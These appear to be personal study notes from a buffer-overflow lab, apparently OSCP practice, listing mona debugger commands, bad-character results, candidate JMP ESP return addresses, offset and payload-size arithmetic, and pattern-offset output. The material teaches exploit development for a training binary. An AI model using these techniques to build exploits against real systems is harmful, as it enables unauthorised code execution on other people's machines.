!mona commands:

1. !mona config -set workingfolder c:\mona\%p

2. !mona findmsp -distance 600

3. !mona bytearray -b "\x00"

4. !mona compare -f C:\mona\oscp\bytearray.bin -a <address>

5. !mona bytearray -b "\x00\xbadchar"

6. !mona jmp -r esp -cpb "\x00"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
see: BOF tutorial by hacking article

at 400 byte --> crashed   

arbitary payload made --> 400 byte

offset --> 314

shellcode --> 351 byte


Address	          Status                   BadChars
0x0182fa30  Corruption after 6 bytes   00 16 17 2f 30 f4 f5 fd
				       => \x00\x16\x17\x2f\x30\xf4\xf5\xfd
				        => \x00\x16\x2f\xf4\xfd
					(as bad char tends to currupt next char as
					 well that doesn't mean that adjucent char
					  is corrupted)  -> 17 30 f5 are victims
 Type	    Location
 normal      Stack


ret addr: 

0x625011af  => LSB --> \xaf\x11\x50\x62
0x625011bb  => LSB --> \xbb\x11\x50\x62
0x625011C7  => LSB --> \xc7\x11\x50\x62
0x625011d3  => LSB --> \xd3\x11\x50\x62
0x625011df  => LSB --> \xdf\x11\x50\x62
0x625011eb  => LSB --> \xeb\x11\x50\x62
0x625011f7  => LSB --> \xf7\x11\x50\x62
0x62501203  => LSB --> \x03\x12\x50\x62
0x62501205  => LSB --> \x05\x12\x50\x62

-----------------------------
Eg:

payload = 

prefix + 1978 + 4 + 16 + 351 ---> 2349 + prefix --> 2349 + 10 --> 2359  (<= 2400)

______________________________________________________________________


at 2100 byte --> crashed

payload made --> 2100 byte  

-----> Technically, it would also work, to find the offset but if it was taken, 
       making payload would be difficult.

_____________
Eg:

kali@reveng ~/T/B/OVERFLOW2> msf-pattern_offset -l 2000 -q 76413176
[*] Exact match at offset 1274

kali@reveng ~/T/B/OVERFLOW2> msf-pattern_offset -l 2100 -q 76413176
[*] Exact match at offset 1274
------------

offset --> 314  => min. byte to overflow buffer/stack

crashed at --> 400 => offset present b/w 300 and 400 (most probably) according to fuzzing script




